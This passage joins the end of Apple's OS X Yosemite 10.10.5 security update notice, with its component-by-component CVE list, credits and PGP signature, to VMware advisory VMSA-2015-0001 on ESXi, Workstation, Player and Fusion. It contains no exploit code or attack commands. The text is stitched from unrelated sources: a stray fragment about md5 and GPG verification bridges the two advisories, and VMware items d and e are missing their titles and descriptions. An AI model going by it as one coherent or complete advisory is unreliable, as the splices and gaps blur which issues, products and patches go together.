in password authentication. The issue was addressed through improved
state management.
CVE-ID
CVE-2015-3799 : an anonymous researcher working with HP's Zero Day
Initiative
AppleGraphicsControl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in AppleGraphicsControl which could
have led to the disclosure of kernel memory layout. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in
IOBluetoothHCIController. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory management issue could have led to the
disclosure of kernel memory layout. This issue was addressed with
improved memory management.
CVE-ID
CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze
Networks
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious app may be able to access notifications from
other iCloud devices
Description: An issue existed where a malicious app could access a
Bluetooth-paired Mac or iOS device's Notification Center
notifications via the Apple Notification Center Service. The issue
affected devices using Handoff and logged into the same iCloud
account. This issue was resolved by revoking access to the Apple
Notification Center Service.
CVE-ID
CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security
Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng
Wang (Indiana University)
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with privileged network position may be able to
perform denial of service attack using malformed Bluetooth packets
Description: An input validation issue existed in parsing of
Bluetooth ACL packets. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-3787 : Trend Micro
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: Multiple buffer overflow issues existed in blued's
handling of XPC messages. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-3777 : mitp0sh of [PDX]
bootp
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have
broadcast MAC addresses of previously accessed networks via the DNAv4
protocol. This issue was addressed through disabling DNAv4 on
unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,
University of Oxford (on the EPSRC Being There project)
CloudKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access the iCloud
user record of a previously signed in user
Description: A state inconsistency existed in CloudKit when signing
out users. This issue was addressed through improved state handling.
CVE-ID
CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in CoreMedia Playback.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-5777 : Apple
CVE-2015-5778 : Apple
CoreText
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities in cURL and libcurl prior to
7.38.0, one of which may allow remote attackers to bypass the Same
Origin Policy.
Description: Multiple vulnerabilities existed in cURL and libcurl
prior to 7.38.0. These issues were addressed by updating cURL to
version 7.43.0.
CVE-ID
CVE-2014-3613
CVE-2014-3620
CVE-2014-3707
CVE-2014-8150
CVE-2014-8151
CVE-2015-3143
CVE-2015-3144
CVE-2015-3145
CVE-2015-3148
CVE-2015-3153
Data Detectors Engine
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a sequence of unicode characters can lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in processing of
Unicode characters. These issues were addressed through improved
memory handling.
CVE-ID
CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Applications that rely on system time may have unexpected
behavior
Description: An authorization issue existed when modifying the
system date and time preferences. This issue was addressed with
additional authorization checks.
CVE-ID
CVE-2015-3757 : Mark S C Smith
Dictionary Application
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with a privileged network position may be able
to intercept users' Dictionary app queries
Description: An issue existed in the Dictionary app, which did not
properly secure user communications. This issue was addressed by
moving Dictionary queries to HTTPS.
CVE-ID
CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security
Team
DiskImages
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-3804 : Apple
CVE-2015-5775 : Apple
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple issues in pdfroff
Description: Multiple issues existed in pdfroff, the most serious of
which may allow arbitrary filesystem modification. These issues were
addressed by removing pdfroff.
CVE-ID
CVE-2009-5044
CVE-2009-5078
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
TIFF images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5758 : Apple
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Visiting a maliciously crafted website may result in the
disclosure of process memory
Description: An uninitialized memory access issue existed in
ImageIO's handling of PNG and TIFF images. Visiting a malicious
website may result in sending data from process memory to the
website. This issue is addressed through improved memory
initialization and additional validation of PNG and TIFF images.
CVE-ID
CVE-2015-5781 : Michal Zalewski
CVE-2015-5782 : Michal Zalewski
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An issue existed in how Install.framework's 'runner'
binary dropped privileges. This issue was addressed through improved
privilege management.
CVE-ID
CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A race condition existed in
Install.framework's 'runner' binary that resulted in
privileges being incorrectly dropped. This issue was addressed
through improved object locking.
CVE-ID
CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Memory corruption issues existed in IOFireWireFamily.
These issues were addressed through additional type input validation.
CVE-ID
CVE-2015-3769 : Ilja van Sprundel
CVE-2015-3771 : Ilja van Sprundel
CVE-2015-3772 : Ilja van Sprundel
IOGraphics
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in IOGraphics. This
issue was addressed through additional type input validation.
CVE-ID
CVE-2015-3770 : Ilja van Sprundel
CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A buffer overflow issue existed in IOHIDFamily. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5774 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in the mach_port_space_info interface,
which could have led to the disclosure of kernel memory layout. This
was addressed by disabling the mach_port_space_info interface.
CVE-ID
CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,
@PanguTeam
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2015-3768 : Ilja van Sprundel
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A resource exhaustion issue existed in the fasttrap
driver. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A validation issue existed in the mounting of HFS
volumes. This was addressed by adding additional checks.
CVE-ID
CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute unsigned code
Description: An issue existed that allowed unsigned code to be
appended to signed code in a specially crafted executable file. This
issue was addressed through improved code signature validation.
CVE-ID
CVE-2015-3806 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A specially crafted executable file could allow unsigned,
malicious code to execute
Description: An issue existed in the way multi-architecture
executable files were evaluated that could have allowed unsigned code
to be executed. This issue was addressed through improved validation
of executable files.
CVE-ID
CVE-2015-3803 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute unsigned code
Description: A validation issue existed in the handling of Mach-O
files. This was addressed by adding additional checks.
CVE-ID
CVE-2015-3802 : TaiG Jailbreak Team
CVE-2015-3805 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted plist may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption existed in processing of malformed
plists. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein
(@jollyjinx) of Jinx Germany
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed. This was addressed
through improved environment sanitization.
CVE-ID
CVE-2015-3761 : Apple
Libc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted regular expression may lead
to an unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in the TRE library.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-3796 : Ian Beer of Google Project Zero
CVE-2015-3797 : Ian Beer of Google Project Zero
CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: Memory corruption issues existed in handling AF_INET6
sockets. These were addressed by improved memory handling.
CVE-ID
CVE-2015-5776 : Apple
libpthread
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling syscalls.
This issue was addressed through improved lock state checking.
CVE-ID
CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in libxml2 versions prior
to 2.9.2, the most serious of which may allow a remote attacker to
cause a denial of service
Description: Multiple vulnerabilities existed in libxml2 versions
prior to 2.9.2. These were addressed by updating libxml2 to version
2.9.2.
CVE-ID
CVE-2012-6685 : Felix Groebert of Google
CVE-2014-0191 : Felix Groebert of Google
libxml2
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory access issue existed in libxml2. This was
addressed by improved memory handling
CVE-ID
CVE-2014-3660 : Felix Groebert of Google
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory corruption issue existed in parsing of XML
files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3807 : Apple
libxpc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling of
malformed XPC messages. This issue was improved through improved
bounds checking.
CVE-ID
CVE-2015-3795 : Mathew Rowley
mail_cmds
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary shell commands
Description: A validation issue existed in the mailx parsing of
email addresses. This was addressed by improved sanitization.
CVE-ID
CVE-2014-7844
Notification Center OSX
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access all
notifications previously displayed to users
Description: An issue existed in Notification Center, which did not
properly delete user notifications. This issue was addressed by
correctly deleting notifications dismissed by users.
CVE-ID
CVE-2015-3764 : Jonathan Zdziarski
ntfs
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in NTFS. This issue
was addressed through improved memory handling.
CVE-ID
CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze
Networks
OpenSSH
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Remote attackers may be able to circumvent a time delay for
failed login attempts and conduct brute-force attacks
Description: An issue existed when processing keyboard-interactive
devices. This issue was addressed through improved authentication
request validation.
CVE-ID
CVE-2015-5600
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in OpenSSL versions prior
to 0.9.8zg, the most serious of which may allow a remote attacker to
cause a denial of service.
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
perl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted regular expression may lead to
disclosure of unexpected application termination or arbitrary code
execution
Description: An integer underflow issue existed in the way Perl
parsed regular expressions. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2013-7422
PostgreSQL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: An attacker may be able to cause unexpected application
termination or gain access to data without proper authentication
Description: Multiple issues existed in PostgreSQL 9.2.4. These
issues were addressed by updating PostgreSQL to 9.2.13.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
python
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Python 2.7.6, the most
serious of which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in Python versions
prior to 2.7.6. These were addressed by updating Python to version
2.7.10.
CVE-ID
CVE-2013-7040
CVE-2013-7338
CVE-2014-1912
CVE-2014-7185
CVE-2014-9365
QL Office
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted Office document may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of Office
documents. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5773 : Apple
QL Office
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML file may lead to
disclosure of user information
Description: An external entity reference issue existed in XML file
parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted QuickTime file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of
QuickTime files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5771 : Apple
Quick Look
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Searching for a previously viewed website may launch the web
browser and render that website
Description: An issue existed where QuickLook had the capability to
execute JavaScript. The issue was addressed by disallowing execution
of JavaScript.
CVE-ID
CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3772
CVE-2015-3779
CVE-2015-5753 : Apple
CVE-2015-5779 : Apple
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3765 : Joe Burnett of Audio Poison
CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-5751 : WalkerFuz
SceneKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted Collada file may lead to
arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5772 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in SceneKit. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A standard user may be able to gain access to admin
privileges without proper authentication
Description: An issue existed in handling of user authentication.
This issue was addressed through improved authentication checks.
CVE-ID
CVE-2015-3775 : [Eldon Ahrold]
SMBClient
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in the SMB client.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3773 : Ilja van Sprundel
Speech UI
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted unicode string with speech
alerts enabled may lead to an unexpected application termination or
arbitrary code execution
Description: A memory corruption issue existed in handling of
Unicode strings. This issue was addressed by improved memory
handling.
CVE-ID
CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in sudo versions prior to
1.7.10p9, the most serious of which may allow an attacker access to
arbitrary files
Description: Multiple vulnerabilities existed in sudo versions prior
to 1.7.10p9. These were addressed by updating sudo to version
1.7.10p9.
CVE-ID
CVE-2013-1775
CVE-2013-1776
CVE-2013-2776
CVE-2013-2777
CVE-2014-0106
CVE-2014-9680
tcpdump
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in tcpdump versions
prior to 4.7.3. These were addressed by updating tcpdump to version
4.7.3.
CVE-ID
CVE-2014-8767
CVE-2014-8769
CVE-2014-9140
Text Formats
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: An XML external entity reference issue existed with
TextEdit parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:
https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4
Y2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6
+PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR
2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev
QpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k
fu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR
A8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz
xjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7
AeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF
sfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW
c5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB
msu6gVP8uZhFYNb8byVJ
=+0e/
-----END PGP SIGNATURE-----
. The verification
of md5 checksums and GPG signatures is performed automatically for you. Summary
VMware vCenter Server, ESXi, Workstation, Player and Fusion address
several security issues. Relevant Releases
VMware Workstation 10.x prior to version 10.0.5
VMware Player 6.x prior to version 6.0.5
VMware Fusion 7.x prior to version 7.0.1
VMware Fusion 6.x prior to version 6.0.5
vCenter Server 5.5 prior to Update 2d
ESXi 5.5 without patch ESXi550-201403102-SG, ESXi550-201501101-SG
ESXi 5.1 without patch ESXi510-201404101-SG
ESXi 5.0 without patch ESXi500-201405101-SG
3. Problem Description
a. VMware ESXi, Workstation, Player, and Fusion host privilege
escalation vulnerability
VMware ESXi, Workstation, Player and Fusion contain an arbitrary
file write issue.
The vulnerability does not allow for privilege escalation from
the guest Operating System to the host or vice-versa. This means
that host memory can not be manipulated from the Guest Operating
System.
Mitigation
For ESXi to be affected, permissions must have been added to ESXi
(or a vCenter Server managing it) for a virtual machine
administrator role or greater.
VMware would like to thank Shanon Olsson for reporting this issue to
us through JPCERT.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the identifier CVE-2014-8370 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======= ======= =================
Workstation 11.x any not affected
Workstation 10.x any 10.0.5
Player 7.x any not affected
Player 6.x any 6.0.5
Fusion 7.x any not affected
Fusion 6.x any 6.0.5
ESXi 5.5 ESXi ESXi550-201403102-SG
ESXi 5.1 ESXi ESXi510-201404101-SG
ESXi 5.0 ESXi ESXi500-201405101-SG
b. VMware Workstation, Player, and Fusion Denial of Service
vulnerability
VMware Workstation, Player, and Fusion contain an input validation
issue in the Host Guest File System (HGFS). This issue may allow
for a Denial of Service of the Guest Operating system.
VMware would like to thank Peter Kamensky from Digital Security for
reporting this issue to us.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the identifier CVE-2015-1043 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======= ======= =================
Workstation 11.x any not affected
Workstation 10.x any 10.0.5
Player 7.x any not affected
Player 6.x any 6.0.5
Fusion 7.x any 7.0.1
Fusion 6.x any 6.0.5
c. VMware ESXi, Workstation, and Player Denial of Service
vulnerability
VMware ESXi, Workstation, and Player contain an input
validation issue in VMware Authorization process (vmware-authd).
This issue may allow for a Denial of Service of the host. On
VMware ESXi and on Workstation running on Linux the Denial of
Service would be partial.
VMware would like to thank Dmitry Yudin @ret5et for reporting
this issue to us through HP's Zero Day Initiative.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the identifier CVE-2015-1044 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======= ======= =================
Workstation 11.x any not affected
Workstation 10.x any 10.0.5
Player 7.x any not affected
Player 6.x any 6.0.5
Fusion 7.x any not affected
Fusion 6.x any not affected
ESXi 5.5 ESXi ESXi550-201501101-SG
ESXi 5.1 ESXi ESXi510-201410101-SG
ESXi 5.0 ESXi not affected
d.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2014-3513, CVE-2014-3567,
CVE-2014-3566 ("POODLE") and CVE-2014-3568 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======= ======= =================
vCenter Server 5.5 any Update 2d*
vCenter Server 5.1 any patch pending
vCenter Server 5.0 any patch pending
ESXi 5.5 ESXi ESXi550-201501101-SG
ESXi 5.1 ESXi patch pending
ESXi 5.0 ESXi patch pending
* The VMware vCenter 5.5 SSO component will be
updated in a later release
e.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2014-3660 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======= ======= =================
ESXi 5.5 ESXi ESXi550-201501101-SG
ESXi 5.1 ESXi patch pending
ESXi 5.0 ESXi patch pending
4. Solution
Please review the patch/release notes for your product and
version and verify the checksum of your downloaded file.
VMware Workstation 10.x
--------------------------------
https://www.vmware.com/go/downloadworkstation
VMware Player 6.x
--------------------------------
https://www.vmware.com/go/downloadplayer
VMware Fusion 7.x and 6.x
--------------------------------
https://www.vmware.com/go/downloadplayer
vCenter Server
----------------------------
Downloads and Documentation:
https://www.vmware.com/go/download-vsphere
ESXi 5.5 Update 2d
----------------------------
File: update-from-esxi5.5-5.5_update01.zip
md5sum: 5773844efc7d8e43135de46801d6ea25
sha1sum: 6518355d260e81b562c66c5016781db9f077161f
http://kb.vmware.com/kb/2065832
update-from-esxi5.5-5.5_update01 contains ESXi550-201403102-SG
ESXi 5.5
----------------------------
File: ESXi550-201501001.zip
md5sum: b0f2edd9ad17d0bae5a11782aaef9304
sha1sum: 9cfcb1e2cf1bb845f0c96c5472d6b3a66f025dd1
http://kb.vmware.com/kb/2099265
ESXi550-201501001.zip contains ESXi550-201501101-SG
ESXi 5.1
----------------------------
File: ESXi510-201404001.zip
md5sum: 9dc3c9538de4451244a2b62d247e52c4
sha1sum: 6b1ea36a2711665a670afc9ae37cdd616bb6da66
http://kb.vmware.com/kb/2070666
ESXi510-201404001 contains ESXi510-201404101-SG
ESXi 5.0
----------------------------
File: ESXi500-201405001.zip
md5sum: 7cd1afc97f5f1e4b4132c90835f92e1d
sha1sum: 4bd77eeb5d7fc65bbb6f25762b0fa74fbb9679d5
http://kb.vmware.com/kb/2075521
ESXi500-201405001 contains ESXi500-201405101-SG
5. Change log
2015-01-27 VMSA-2015-0001
Initial security advisory in conjunction with the release of VMware
Workstation 10.0.5, VMware Player 6.0.5, vCenter Server 5.5 Update 2d
and, ESXi 5.5 Patches released on 2015-01-27. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
Consolidated list of VMware Security Advisories
http://kb.vmware.com/kb/2078735
VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Support Phases
https://www.vmware.com/support/policies/lifecycle.html
Twitter
